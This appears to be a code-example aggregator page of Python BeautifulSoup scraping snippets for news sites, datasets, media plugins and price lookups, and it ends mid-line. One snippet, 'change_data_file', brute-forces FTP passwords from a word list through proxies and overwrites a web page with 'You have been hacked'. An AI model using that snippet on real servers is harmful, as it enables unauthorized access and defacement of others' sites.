Beispiel #1
0
def scrape_home():
        page = requests.get(site)
        soup = BeautifulSoup(page.text)
        soup.prettify()
        for anchor in soup.findAll('a',{'class':'newsitem2'}):
                try:
                    #print "[+] Found article:"
                    title = anchor['title']
                    link = anchor['href']
                    dts = datetime.strptime(link[9:17], '%Y%m%d') # chop-chop goes the string
                    articleId = link[23:32] # more chop-chop, thx for consistent strings
                    # Debugging, printing output to screen
                    #print "Title: " + anchor['title']
                    #print "Date: " + str(dts)
                    #print "Link: " + anchor['href']
                    #print "ID: " + articleId
                    #print ""
                    #print dts
                    # Parse the link
                    # Pull out Date, ID, and full Link
                    if len(title) > 0: # If the link has a title, save into list
                            links.append(site + link)
                            titles.append(title)
                            storyID.append(articleId)

                except:
                    pass # Else, move on, don't save link
def scrapeDataset(index):
  try:
    record = {}
    record['id'] = index
    url = baseUrl + str(index)
    record['url'] = url
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    print soup.prettify()
    content = soup.find('div',id='content')
    record['title'] = content.find('h1',{'class':'title'}).text
    ps = content.findAll('p')
  # record['created'] = ps[0].text
    record['categories'] = ps[1].text
  # record['description'] = ps[3:len(ps)]

    table = content.find('table',{'class':'dataset'})
    trs = table.findAll('tr')
    record['extent'] = trs[0].findAll('td')[0].text
    record['agency'] = trs[1].findAll('td')[0].text
    record['update_frequency'] = trs[2].findAll('td')[0].text
    record['date_range'] = trs[3].findAll('td')[0].text
    record['date_published'] = trs[4].findAll('td')[0].text
    record['date_of_last_revision'] = trs[5].findAll('td')[0].text
    record['license_summary'] = trs[6].findAll('td')[0].find('a')['href']
    distributions = trs[7:]
    dists = {}
    for dist in distributions:
      dists[dist.find('th').text] = dist.find('td').text
    record['distributions'] = dists
  # print(dists)
    scraperwiki.sqlite.save(unique_keys=['url'], data=[record])
  # print record
  except:
    None
Beispiel #3
0
def getWishes(pseudo):
    lines = []
    pages = getPages(pseudo)
    if pages == 0:
        return
    for i in range(1,pages+1):
        page = urllib2.urlopen(url+'/page-'+str(i)).read()
        soup = BeautifulSoup(page)
        soup.prettify()
        for empty in soup.findAll("li",{"class" : "elco-collection-item-empty d-emptyMessage"}):
            print "Aborting : there isn't a single movie in your wishlist yet :("
            return
        for wish in soup.findAll("li",{"class" : "elco-collection-item"}):
            wish_json = '<li>'
            for element_title in wish.findAll("div",{"class" : "elco-collection-content"}):
                exist = False
                for title_original in element_title.findAll('span',{'class':'elco-original-title'}):
                    link = getLink(title_original.text.encode('utf-8'))
                    wish_json = wish_json + '<a href="' + str(link) + '">' + title_original.text.encode('utf-8') + '</a></li>'
                    lines.append(wish_json)
                    exist = True
                for title in element_title.findAll('a',{"class": "elco-anchor"}):
                    if exist is False:
                        link = getLink(title.text.encode('utf-8'))
                        wish_json = wish_json + '<a href="' + str(link) + '">' + title.text.encode('utf-8') + '</a></li>'
                        lines.append(wish_json)

    file = open(pseudo+'.html','w+')
    file.write('<html><body>')
    for line in lines:
        file.write(line)
    file.write('</body></html>')
    file.close()
Beispiel #4
0
def scrape_article(link):
        r = requests.get(link)
        soup = BeautifulSoup(r.text)
        soup.prettify()
        story_text = soup.findAll('span',{'class':'StoryText'})
        stories.append(story_text)
        return True
Beispiel #5
0
 def get_soup(self, geo_query_string):
     MAX_NUM_TRIES = 5
     
     if not geo_query_string:
         return(None)
     try:
         return(self._geo_soups[geo_query_string])
     except KeyError:
         num_tries = 0
         success = False
         getter = get_geo_page
         while (num_tries < MAX_NUM_TRIES and not success):
             raw_html = getter(geo_query_string)
             soup = BeautifulSoup(raw_html)
             # Verify we got a valid page
             try:
                 assert(soup.find(text="Status")) 
                 success = True
                 print("Got geo page for %s" %geo_query_string)
             except:
                 print("Couldn't get page for %s.  Sleeping and will try again" %geo_query_string)
                 time.sleep(2)
                 num_tries += 1
                 getter = uncached_get_geo_page
         if not success:
             print soup.prettify()
             raise Exception("Page for %s not retrieved.  Perhaps server down or no internet connection?" %geo_query_string)
         self._geo_soups[geo_query_string] = soup
         return(soup)
def parse_speech(url):
    data = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    content = soup.find('div', {'id' : 'mainColumn' })
    title = content.h1.text
    author = content.find('p', {'class' : 'detail'}).text[2:]
    position = content.p.nextSibling.text
    date_and_place = content.find('p', {'class' : 'detail alternate'})
    date = date_and_place.text.partition(',')[0]
    place = date_and_place.text.partition(',')[2]
    body = content.findAll(lambda tag: len(tag.name) == 1 and not tag.attrs)

    # Re-join the body, otherwise it shows up with array cruft in the JSON
    body = ''.join(str(tag) for tag in body)

    data['title'] = title
    data['body'] = body
    data['minister_name'] = author
    data['minister_position'] = position
    data['date'] = date
    data['where'] = place
    data['source_url'] = url
    data['department'] = 'Business, Innovation and Skills'
    print "Save: " + str(data)
    scraperwiki.sqlite.save(["title", "source_url"], data)
def scrapeyear(url, year):
    seen_before = scraperwiki.metadata.get(url)
    if seen_before is not None:
        print "Seen before - skip: " + url
        return
    else:
        print "vinnum ur " + year
    data = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    
    table = soup.find('table', {'id' : 'mot-tafla'})
    trs = table.findAll('tr')
    for td in trs[1:]:
         items = td.findAll('td')
         slod = 'http://www.ksi.is/mot/motalisti/' + items[1].a['href']
         motanumer = re.sub('http:\//www.ksi.is\/mot\/motalisti\/urslit-stada/\?MotNumer=','',slod)
         mot = items[1].text
         flokkur = items[3].text
         data['slod'] = slod
         data['year'] = year
         data['motanumer'] = motanumer
         data['flokkur'] = flokkur
         data['mot'] = mot

         #print data
         print "vistum " + year
         scraperwiki.datastore.save(["mot", "year"], data) 
         scraperwiki.metadata.save(url,"1")  
Beispiel #8
0
 def getcontentparas(self, html, domain):
     bs = BeautifulSoup(html)
     bs.prettify()
     body = []
     try:
         if domain == "engadget":
             body = bs.findAll('div', attrs={'class':'post_body'})[0].contents
             body = body[2:len(body)-4]
         elif domain == "mashable":
             body = bs.findAll('div', attrs={'class':'description'})
         elif domain == "techcrunch":
             body = bs.findAll('div', attrs={'class':'body-copy'})[0].contents
         elif domain == "huffingtonpost":
             body = bs.findAll('div', attrs={'class':'entry_body_text'})[0].contents
             body = body[3:len(body)-10]
         elif domain == "treehugger":
             body = bs.findAll('div', attrs={'id':'entry-body'})[0].contents
         elif domain == "businessinsider":
             x = bs.findAll('div', attrs={'class':'KonaBody post-content'})
             if type(x) is list:
                 body = x[0].contents
                 body = body[1:len(body)]
             elif x:
                 body = x
             else:
                 print "body not initialized: "
         #print body
         blogparas = ""
         blogparas = self.getparas(body)
         return blogparas
     except:
         print "para not found: "
         return "0"
def scrape_safn(url):
        html = scraperwiki.scrape(url)
        soup = BeautifulSoup(html)
        soup.prettify()

        # Forum i gegnum alla tengla sem hafa class=headnews
        frettir = soup.findAll('a', { "class" : "headnews" })
Beispiel #10
0
 def scrape_videos(self, br, htmlscraper, parser, wpPost, videoUrls):
     postList = wpPost.get_posts(10000)
     for i in range(len(videoUrls)):
         try:
             print "---------------------" + str(i) + " from " + str(len(videoUrls)) + "------------------------"
             title = htmlscraper.convert_hypen_into_space(parser.split_url(videoUrls[i]))
             print "title: " + htmlscraper.uppercase_first_letter_from_string(title)
             if (self.dataHandler.is_this_item_on_the_list(title, postList)):
                 print "Content already posted"
             else:
                 print "Video scraping started ..."
                 tags = htmlscraper.convert_title_to_categories(str(title))
                 soup = BeautifulSoup(br.scrap_website(videoUrls[i]))
                 soup.prettify()
                 thumbnail = parser.get_thumbnail(soup)
                 print "thumbnail: " + thumbnail
                 paraVideo = parser.parse_video_id(videoUrls[i])
                 iframe = parser.create_video_iframe(paraVideo[0], paraVideo[1])
                 print "iframe: " + iframe
                 video_duration = parser.get_duration(soup)
                 print "video duration: " + video_duration
                 embedurl = htmlscraper.parse_src_from_video_iframe(iframe)
                 print "embedurl " + embedurl
                 duration_for_snippets = parser.prepare_duration_for_snippets(video_duration)
                 print "duration for snippets: " + duration_for_snippets
                 print "Wordpress post creator starting ..."
                 wpPost.createPost(title, thumbnail, iframe, video_duration, duration_for_snippets, tags, embedurl)
                 print "Scraped video [OK]"
         except:
             pass
def getDescription(url):
	sizeToReturn = 200
	
	request = urllib2.Request(url) #create a request
	request.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')  #http://whatsmyuseragent.com/
	opener = urllib2.build_opener()
	feeddata = opener.open(request).read() #feeddata is the html data received
	opener.close()
	request.close()
	soup = BeautifulSoup(''.join(feeddata))  #make it into beautifulsoup
	soup.prettify() #correct errors
	paras = soup.findAll('p')
	
	
	
	i = 0
	text = ''
	for pa in paras:
		for res in pa.findAll(text=True):
			if(i > 2):
				text = text + res
		i = i + 1
	
	
	textToReturn = text.replace('\n','  ')
	
	if(len(textToReturn) < sizeToReturn):
		while(len(textToReturn) < sizeToReturn):
			textToReturn = textToReturn + "    "
		return textToReturn[0:sizeToReturn]
	else:
		return textToReturn[0:sizeToReturn]
def getTVTree(url):
    data = common.getURL(url)
    scripts = re.compile(r'<script.*?script>', re.DOTALL)
    data = scripts.sub('', data)
    style = re.compile(r'<style.*?style>', re.DOTALL)
    data = style.sub('', data)
    tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    atf = tree.find(attrs={'id': 'atfResults'})
    if atf == None:
        print tree.prettify()
        return False
    atf = tree.find(attrs={'id': 'atfResults'}).findAll('div', recursive=False)
    try:
        btf = tree.find(attrs={
            'id': 'btfResults'
        }).findAll(
            'div', recursive=False)
        atf.extend(btf)
        del btf
    except:
        print 'AMAZON: No btf found'
    nextpage = tree.find(attrs={
        'title': 'Next page',
        'id': 'pagnNextLink',
        'class': 'pagnNext'
    })
    del data
    return atf, nextpage
Beispiel #13
0
def read_manga(params):

	link='http://manga24.ru/%s'%params['m_path']
	print link
	http = GET(link)
	if http == None: return False
	beautifulSoup = BeautifulSoup(http)
	beautifulSoup.prettify()
	body=str(beautifulSoup).split('\n')
	d_f=None
	i_f=None
	imgs=[]
	pat=re.compile('[a-zA-Z0-9-_.!]+.[png|jpg|PNG|JPG]', re.S)
	for line in body:
		if line.split(':')[0].find('dir')>0 and not d_f: 
			url=line.split('"')[1].replace('\/','/')
			d_f=True
		if line.split(':')[0].find('images')>0 and not i_f: 
			img = re.findall(pat, line)
			i_f=True
	for ism in img:
		try:
			mm=xbmcgui.ListItem(ism,addon_icon,addon_icon)
			xbmcplugin.addDirectoryItem(hos,url+ism,mm,False)
			print ism
		except: pass

	xbmcplugin.endOfDirectory(handle=hos, succeeded=True, updateListing=False, cacheToDisc=True)
Beispiel #14
0
	def __getStationImage(self):
		img = None

		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor)

		soup = None
		print "Connecting to " + self.url
		try:
			response = opener.open(self.url)
			data = response.read()
			soup = BeautifulSoup(data)
			soup.prettify()
			print "Connection OK"
		except urllib2.HTTPError:
			print "ERROR in connection"

		if (soup):
			img = str(soup)
			try:
				img = re.findall('[fF]oto\=.+\&amp\;lenguaje', img)[0]
				img = re.sub('([fF]oto\=\s?|\&amp\;lenguaje)', '', img)
				img = 'http://www.ingurumena.ejgv.euskadi.net' +  urllib.quote(img)
			except:
				img = None

		return img
Beispiel #15
0
def query_chaoscards (card_number):
    result = {}

    card_number = card_number.replace ("_", ":").replace ("-", ":");

    print card_number;

    url = 'http://www.chaoscards.co.uk/rss/1/productlistings_rss/c84:' + card_number
    page = urllib2.urlopen (url).read ()

    soup = BeautifulSoup (page)

    item = soup.find ('item');

    if not hasattr (item, 'guid'):
        return;

    url = item.guid.contents[0]
    page = urllib2.urlopen (url).read ()

    soup = BeautifulSoup (page)
    soup.prettify ()

    price = soup.find (id='price_break_1').span.span.span.contents[0]
    r = price_regex.search(str (price))
    price = r.groups ()[0]

    result = {
        'card_number': card_number,
        'card_name': soup.find (id='product_title').contents[0],
        'price': price
    }

    return result
Beispiel #16
0
def query_koolkingdoms (card_number):
    result = {}
    url = 'http://www.koolkingdom.co.uk/acatalog/info_' + card_number + '.html';
    try:
        try:
            #Attempt to get page with standard URL
            page = urllib2.urlopen(url).read();
        except urllib2.HTTPError:
            #On failure attempt alternative
            page = urllib2.urlopen(url.replace ("_", "-")).read()
    except urllib2.HTTPError:
        print card_number + " could not be found"
        return result;

    soup = BeautifulSoup(page)
    soup.prettify()

    card_name = soup.title.string

    price = soup.find('actinic:prices').span
    r = price_regex.search(str (price))
    price = r.groups ()[0]

    result = {
        'card_number': card_number,
        'card_name': card_name,
        'price': price
    }

    return result;
Beispiel #17
0
def google_backlinks(domain):
    try:
        logger.info("begin google_backlinks for domain %s" % domain)
        import urllib2
        from BeautifulSoup import BeautifulSoup
        #from http://stackoverflow.com/questions/802134/changing-user-agent-on-urllib2-urlopen
        url = "https://www.google.com/search?q=%s".format(domain,domain)
        keyword = '"{0}" -site:{1}'.format(domain,domain)
        url = (url % urllib.quote_plus(keyword))
        logger.info(url)
        headers = { 'User-Agent' : 'Mozilla/5.0' }
        req = urllib2.Request(url, None, headers)
        html = urllib2.urlopen(req).read()

        soup = BeautifulSoup(html)
        soup.prettify()
        result =soup.find("div",{"id": "resultStats"}).string
        logger.info("Results %s" %  result)
        if result:
            if result=='1 result':
                return 1
            result = result.lower().replace("about ","")
            result = result.replace(" results","")
            result = result.replace(',','')
        else:
            result= 0

        logger.info("google_backlinks domain %s results %s" % (domain, result))
        return result
    except Exception,e:
        logger.error(e)
        return -1
def httpParse(tempname):
    """parse http or https links in the downloaded webpage"""
    the_page = open('temp/'+tempname, 'r').read()
    soup = BeautifulSoup(the_page)
    soup.prettify()
    all_links = []
    temp_links = []

    #TODO: add images or other links apart from href?
    #TODO: this saves all links local and http/https - need to parse
    for anchor in soup.findAll('a', href=True):
        #print anchor['href']
        # use unicode to make links non-navigable
        link = unicode(anchor['href'])
        all_links.append( link )

        # create link set from list_of_links
        split_link = link.split("/")
        # if external link
        if 'http' in split_link[0]:
            temp_links.append(split_link[2])
    #for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')):
    #	if link.has_attr('href'):
    #		print link['href']
    #return link['href']

    # take set of external links
    link_set = list(set(temp_links))

    return all_links, link_set
def processEpisodes(url):
    data = common.getURL(url)
    remove = re.compile('<script.*?script>', re.DOTALL)
    data = re.sub(remove, '', data)
    remove = re.compile('<\\!--.*?-->', re.DOTALL)
    data = re.sub(remove, '', data)
    htmldata = demjson.decode(data)['display']
    remove = re.compile('"<div.*?div>"')
    htmldata = re.sub(remove, '""', htmldata)
    tree=BeautifulSoup(htmldata, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    episodes = tree.findAll('div',attrs={'class':re.compile('video-image-wrapper video')})
    if len(episodes) == 0:
        return False
    for episode in episodes:
        print episode.prettify()
        url = episode.find('a')['href']
        name = episode.find('img')['title']
        thumb = episode.find('img')['src']
        u = sys.argv[0]
        u += '?url="'+urllib.quote_plus(url)+'"'
        u += '&mode="lifetime"'
        u += '&sitemode="playepisode"'
        infoLabels={ "Title":name,
                    "TVShowTitle":common.args.name}
        common.addVideo(u,name,thumb,infoLabels=infoLabels)
    return True
def scrape_skjalfta(url):
        html = scraperwiki.scrape(url)
        soup = BeautifulSoup(html)
        soup.prettify()
        table = soup.find ('table', { 'width' : '80%' })
        tr = table.findAll('tr')
        for tr in tr:
            date = tr.findNext('td')
            date_store = re.sub(" \d+:\d+","",date.text)
            date_time = date.text
            time = re.sub("\d+-\d+-\d+ ","",date.text)
            location=date.findNext('td')
            lat = location.text[:4]
            lng = location.text[5:]
            latlng = [lat,lng]
            latlng_float= map(float, latlng)
            size=location.findNext('td')
            distance=size.findNext('td')
            landmark=distance.findNext('td')
            quake['date'] = date_store
            quake['time'] = time
            quake['date_time'] = date_time
            quake['lat'] = lat
            quake['lng'] = lng
            quake['size'] = size.text
            quake['distance'] = distance.text
            quake['landmark'] = landmark.text
            print quake
            scraperwiki.datastore.save(["date_time"], quake, latlng=(latlng_float))
Beispiel #21
0
def play():
    smilurl=common.args.url
    swfUrl = 'http://www.bravotv.com/_tp/pdk/swf/flvPlayer.swf'
    if (common.settings['enableproxy'] == 'true'):proxy = True
    else:proxy = False
    data = common.getURL(smilurl,proxy=proxy)
    tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    rtmpbase = tree.find('meta')
    if rtmpbase:
        rtmpbase = rtmpbase['base']
        items=tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                playpath = item['src']
                if '.mp4' in playpath:
                    playpath = 'mp4:'+playpath
                else:
                    playpath = playpath.replace('.flv','')
                finalurl = rtmpbase+' playpath='+playpath + " swfurl=" + swfUrl + " swfvfy=true"
    else:
        items=tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                finalurl = item['src']
    item = xbmcgui.ListItem(path=finalurl)
    xbmcplugin.setResolvedUrl(pluginhandle, True, item)
def addSection(link, title):
    if not 'http' in link:
        page = urllib2.urlopen('http://www.paulgraham.com/'+link).read()
        soup = BeautifulSoup(page)
        soup.prettify() 
    else:
        page = urllib2.urlopen(link).read()
        
    section = ez_epub.Section()
    try:
        section.title = title
        print section.title

        if not 'http' in link:
            font = str(soup.findAll('table', {'width':'455'})[0].findAll('font')[0])
            if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100:
                content = font
            else:
                content = ''
                for par in soup.findAll('table', {'width':'455'})[0].findAll('p'):
                    content += str(par)

            for p in content.split("<br /><br />"):
                section.text.append(genshi.core.Markup(p))

            #exception for Subject: Airbnb
            for pre in soup.findAll('pre'):
                section.text.append(genshi.core.Markup(pre))
        else:
            for p in str(page).replace("\n","<br />").split("<br /><br />"):
                section.text.append(genshi.core.Markup(p))
    except:
        pass
    
    return section
Beispiel #23
0
def send_sms(toMobileNo, textMsg):
    token = open_main_and_get_token()
    post_props, form = open_send_sms_url(token)

    mob_no_param = get_mob_no_param(form)
    token_param = get_token_param(form)

    post_props[mob_no_param] = toMobileNo
    post_props[token_param] = token
    post_props['textArea'] = textMsg
    post_props['nrc'] = 'nrc'
    post_props['wasup'] = 'push358'
    post_props['HiddenAction'] = 'instantsms'
    post_props['chkall'] = 'instantsms'

    post_data = urllib.urlencode(post_props)

    if (_DEBUG == True):
        print 'Generated Post Props:'
        print post_props
        print 'Generated Post_data:'
        print post_data

    fp = URL_OPENER.open(WAY_TO_SMS_SEND_SMS_POST_URL,post_data)
    if (_DEBUG == True):
        soup=BeautifulSoup(fp.read())
        print soup.prettify()
    print '\tSMS chunk sent!'
Beispiel #24
0
def play():
    smilurl=common.args.url
    #+'&manifest=m3u'
    swfUrl = 'http://www.syfy.com/_utils/video/codebase/pdk/swf/flvPlayer.swf'
    if (common.settings['enableproxy'] == 'true'):proxy = True
    else:proxy = False
    data = common.getURL(smilurl,proxy=proxy)
    tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    rtmpbase = tree.find('meta')
    if rtmpbase:
        rtmpbase = rtmpbase['base']
        items=tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                playpath = item['src']
                if '.mp4' in playpath:
                    playpath = 'mp4:'+playpath
                else:
                    playpath = playpath.replace('.flv','')
                finalurl = rtmpbase+' playpath='+playpath + " swfurl=" + swfUrl + " swfvfy=true"
    else:
        #open m3u
        data = common.getURL(smilurl+'&manifest=m3u',proxy=proxy)
        tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
        print tree.prettify()
        items=tree.find('seq').findAll('video')
        item=items[0]
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        #for item in items:
        #    bitrate = int(item['system-bitrate'])
        #    if bitrate > hbitrate and bitrate <= sbitrate:
        #        hbitrate = bitrate
        m3u8url = item['src']
        origfilename=m3u8url.split('/')[-1]
        data = common.getURL(m3u8url,proxy=proxy)
       # lines=data.splitlines()
        #print "D",data
        #bitrate on url isn't used
        #.split('b__=')[0]+'b__='+common.settings['quality']
        #print data
        items=re.compile('BANDWIDTH=(\d*).*\n(.*)(\n)').findall(data)
        #print "%^&^",items
        for item in items:
            #print line

            bitrate = int(item[0])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
               # print "BR",bitrate
                filename = item[1]
        finalurl=m3u8url.replace(origfilename,filename)
    item = xbmcgui.ListItem(path=finalurl)
    xbmcplugin.setResolvedUrl(pluginhandle, True, item)
Beispiel #25
0
    def summary(self):
        self.infolist.sort(key=lambda generalinfo: generalinfo.contestrank)

        now = datetime.datetime.now()
        otherStyleTime = now.strftime("%Y-%m-%d")
        timestring = time.asctime()
        file = open('Summary@' + otherStyleTime + '.html', 'w')
        filecopy = open('Summary.html', 'w')
        body = ''
        head = '''
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html" charset = "utf-8">
	<title>Board|Contest Rating System</title>
	<link rel="stylesheet" href="board.css" type="text/css" />
</head>
<body>
    <div class="container">
'''
        tail = '<div class="footer"><p>Generated At : ' + timestring + '</p></div></body></html>'
        title = '<h1> NWPU Team Contest @ ' + otherStyleTime + '</h1>'
        tablehead = '''
        <table id="crsboard">
		<thead>
			<th> Rank </th>
			<th> Nickname </th>
			<th> TeamName </th>
			<th> Member </th>
			<th> New Rating </th>
			<th> Old Rating </th>
			<th> Change </th>
		</thead>'''
        cnt = 1
        for i in self.infolist:
            cnt += 1
            if cnt % 2 == 0:
                body += '<tr class="row1">' + '\n'
                if 1:
                    body += self.rankcolor(i.contestrank)
                    body += '<th> ' + str(i.nickname) + ' </th>\n'
                    body += '<th> ' + (i.realname).decode('utf-8') + ' </th>\n'
                    body += self.numcolor(int(i.newrating)) + '\n'
                    body += self.numcolor(int(i.oldrating)) + '\n'
                    body += self.posneg(int(i.newrating - i.oldrating)) + '\n'
                body += '</tr>' + '\n'
            if cnt % 2 == 1:
                body += '<tr class="row2">' + '\n'
                if 1:
                    body += self.rankcolor(i.contestrank)
                    body += '<th> ' + str(i.nickname) + ' </th>' + '\n'
                    body += '<th> ' + (i.realname) + ' </th>' + '\n'
                    body += self.numcolor(int(i.newrating)) + '\n'
                    body += self.numcolor(int(i.oldrating)) + '\n'
                    body += self.posneg(int(i.newrating - i.oldrating)) + '\n'
                body += '</tr>' + '\n'
        htmlraw = head + title + tablehead + body + tail
        htmlcode = BeautifulSoup(htmlraw)
        file.write(htmlcode.prettify())
        filecopy.write(htmlcode.prettify())
Beispiel #26
0
    def change_data_file(self, login_to_server, ip, file_name, ):
        self.login_to_server = login_to_server
        # self.pas_for_ftp = pas_for_ftp
        self.ip = ip
        self.file_name = file_name


        file = "pasw.txt"
        br = Anon(useragent, proxies)
        pf = open(file, 'r') #open a password file
        for line in pf.readlines():
            pas_for_ftp = line.strip('\r').strip('\n')
            try:
                print "login_to_server - ", self.login_to_server
                # print "pas_for_ftp - ", self.pas_for_ftp
                print "IP - ", self.ip
                print "file_name - ", self.file_name

                url = "ftp://" + self.login_to_server + ":" + pas_for_ftp + "@" + self.ip + "/"
                print url
                url2 = url + self.file_name
                print url2

                response = br.open(url2)
                soup = BeautifulSoup(response.get_data())
                b = soup.prettify()
                tag = soup.body
                tag.clear()
                soup = BeautifulSoup("<body></body>")
                original_tag = soup.body
                new_tag = soup.new_tag("p")
                original_tag.append(new_tag)
                tag = soup.p
                tag.string = "You have been hacked"
                a = soup.prettify()
                print "File on server: ", b
                print "File's change: ", a
                request = Request(url2, data=b)
                request.get_host()
                request.get_data()
                print "Done!"
                break



                # response = br.open(url2)
                # html = br.response().get_data().replace("</b>", "< /b>")
                # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK")
                # br.set_response(response)



                # html = br.response().get_data().replace(b, a)
                # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK")
                # br.set_response(response)
                # html2 = br.request().get_data().replace(b, a)
                # mechanize.request_host(html2)
            except:
                print "[*]password", pas_for_ftp, "is incorrect"
Beispiel #27
0
 def _fix_document(self, doc, use_soup=False):
     if use_soup:
         soup = BeautifulSoup(doc)
         soup.prettify()
         doc = unicode(soup)
     else:
         doc = tidy(doc)
     return doc
Beispiel #28
0
 def process_response(self, request, response):
     if 'text/html' in response['Content-Type']:
         soup = BeautifulSoup(response.content)
         try:
             response.content = soup.prettify(spacesPerLevel=4)
         except TypeError, e:    # not alanjds' flavor of Soup
             # so, use official Soup flavor...
             response.content = soup.prettify()
def scrape_aircraft(url):
    aircraft = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    br = soup.findAll('br')
    for br in br:
        br.replaceWith(', ')

    #First table
    table = soup.find('table', {'class' : 'craft' })

    registration_id = table.findNext('tr')
    aircraft['registration_id'] = re.sub("Einkennisstafir:","",registration_id.text)
    registration_nr = registration_id.findNext('tr')
    aircraft['registration_nr'] = re.sub('Skr\xe1ningarn\xfamer:',"",registration_nr.text)
    registration_id = re.sub("Einkennisstafir:","",registration_id.text)
    
    #Second table
    table = table.findNext('table', {'class' : 'craft' })
    make = table.findNext('tr')
    aircraft['make'] = re.sub("Tegund:","",make.text)
    production_year = make.findNext('tr')
    aircraft['production_year'] = re.sub("Framlei\xf0slu\xe1r:","",production_year.text)    
    serial_nr = production_year.findNext('tr')
    aircraft['serial_nr'] = re.sub("Ra\xf0n\xfamer:","",serial_nr.text)    
    
    #Third table
    table = table.findNext('table', {'class' : 'craft' })
    max_weight = table.findNext('tr')
    aircraft['max_weight'] = re.sub("H\xe1marks\xfeungi:","",max_weight.text)
    passenger_nr = max_weight.findNext('tr')
    passenger_nr = re.sub('Far\xfeegafj\xf6ldi:',"",passenger_nr.text)
    if passenger_nr == u"Ekki skr\xe1\xf0ur":
        passenger_nr = "n/a"
    aircraft['passenger_nr'] = passenger_nr

    #Fourth table
    table = table.findNext('table', {'class' : 'craft' })
    owner = table.findNext('tr')
    aircraft['owner'] = re.sub("Eigandi:","",owner.text)
    address = owner.findNext('tr')
    address = address.findNext('td')
    address = address.findNext('td')
    aircraft['owner_address'] = address.text

    #Fifth table
    table = table.findNext('table', {'class' : 'craft' })
    operator = table.findNext('tr')
    aircraft['operator'] = re.sub("Umr\xe1\xf0andi:","",operator.text)
    address = operator.findNext('tr')
    address = address.findNext('td')
    address = address.findNext('td')
    aircraft['operator_address'] = address.text
    scraperwiki.datastore.save(["registration_id"], aircraft)
    scraperwiki.metadata.save(url, '1')

    print aircraft
def scrape_test_center_next_page(url):
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    div = soup.find('div', 'formtext first')
    links = div.findAll('a')
    for a in links:
        url = 'http://www.dft.gov.uk/dsa/' + a['href']
        scrape_test_center(url)
Beispiel #31
0
import urllib2, os
from BeautifulSoup import BeautifulSoup

page = urllib2.urlopen(
    'http://www.dell.com/support/article/de/de/debsdt1/sln308587/microprocessor-side-channel-vulnerabilities-cve-2017-5715-cve-2017-5753-cve-2017-5754-impact-on-dell-products?lang=en#Dell_Products_Affected'
).read()
soup = BeautifulSoup(page)
soup.prettify()
for row in soup.findAll('table')[1].findAll('tbody')[0].findAll('tr'):
    name = row.findAll('td')[0].text
    new_version = row.findAll('td')[1].text

    try:
        # if 1:
        # t =
        # print name
        line = os.popen("grep '%s' README.md" % name).read()
        old_version = line.split(" | ")[1].replace(" ", "").replace("\n", "")
        try:
            status = line.split(" | ")[3].split(" ")[0]
        except:
            status = "no"
        # print status
        if status == "no":
            if old_version != new_version and new_version != "In Process":
                # print old_version
                new_version_link = row.findAll('td')[1].findAll('a')[0]

                page_version = urllib2.urlopen(
                    'http:%s' % new_version_link['href']).read()
                soup_version = BeautifulSoup(page_version)
Beispiel #32
0
def getLinks(i, limit):
    global j
    global visitedHash
    global JuLiDoTheThing
    global GlobalDictForWordFreq
    last = False
    while (i < limit):
        # if (i < limit):
        TempDictForWordFreq = dict()
        # This if statement writes to the file when the document counter is
        # divisible by 500.

        if (i % 500 == 0 and i != 0):
            print "I am going to write to the file because we've hit a mulitple of 500! WHOOOO!!!"
            writeToFile(last)

        ## This try catch block allows the file to be written to, even if the
        ## queue is empty, or the link is unable to be opened.
        ## TODO: Make sure that if the queue is empty, it isn't an infinite loop.

        try:
            # Get the next URL on the queue and open it
            url = linksQ.dequeue()
        except:
            print "The queue is empty!! Good for you!!"
            writeToFile(last)
            return

        if (delay):
            t0 = time.time()
            slowDown()
        try:
            # html = urllib.urlopen(url, timeout=4).read()
            html = urllib.urlopen(url).read()
            soup = BeautifulSoup(html)
        except:
            print "You couldn't open the URL:", url
            # i += 1
            # writeToFile(last)
            last = True
            # getLinks(i, limit)
            continue

        # print "Here is the url we are checking: " + url
        # print "When you try to get the visisted hash link file:", visitedHash.get(url, False)
        # print ""
        # If we have visited the URL before, do not find the links a second time
        if (visitedHash.get(url, False) != False):
            i += 1
            print "You've already been to " + str(i), url

            # Instead, move to the next url in the queue
            continue

        # If it is a new URL, find the links and tokens in the webpage
        else:
            for link in soup.findAll('a'):
                # Gets the new URLs for each webpage
                newLink = (link.get('href'))
                if (newLink != None):

                    # Check if the URL is absolute or relative
                    if (len(newLink) > 7
                            and (re.match(r"http\:\/\/", newLink[0:7])
